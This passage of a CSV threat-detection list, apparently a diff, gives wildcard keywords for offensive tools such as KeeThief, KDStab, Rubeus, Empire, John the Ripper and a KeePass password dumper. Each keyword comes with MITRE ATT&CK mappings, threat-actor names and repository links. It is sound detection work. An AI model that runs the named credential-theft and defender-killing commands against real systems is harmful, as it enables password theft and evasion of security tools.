Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*KcpPassword.cs*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*kdcdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kdstab * /CHECK*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 
- Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /CLOSE*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /DRIVER*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /LIST*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /NAME*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /PID*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /SERVICE*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z"
+"*kdstab * /STRIP*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z"
+"*kdstab * /UNLOAD*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and 
Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z"
+"*kdstab.cna*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 
- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z"
+"*KeeFarceReborn.*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,,
+"*KeePass.sln*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
+"*keepass_common_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*keepass_discover.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*keepass2john *.kdbx*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*KeePassBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
+"*KeePassConfig.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*KeePassConfig.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
+"*-KeePassConfigTrigger*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - 
Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*keepass-password-dumper*","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","6","567","47","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z"
+"*KeePwn plugin add -u * -p * -d * -t *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*KeePwn plugin check -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*KeeTheft/Dinvoke*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10",,"N/A",,,
+"*KeeThief*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X 
key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
+"*KeeThief.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*KeeThief.ps1*","offensive_tool_keyword","empire","Empire scripts 
paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*KeeThiefSyscalls*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10",,"N/A",,,
+"*keethief-syscalls*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - 
T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"*keodbianoliadkoelloecbhllnpiocoi*","greyware_tool_keyword","Hide My IP VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*kerberoast /*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*kerberoast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Kerberoast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
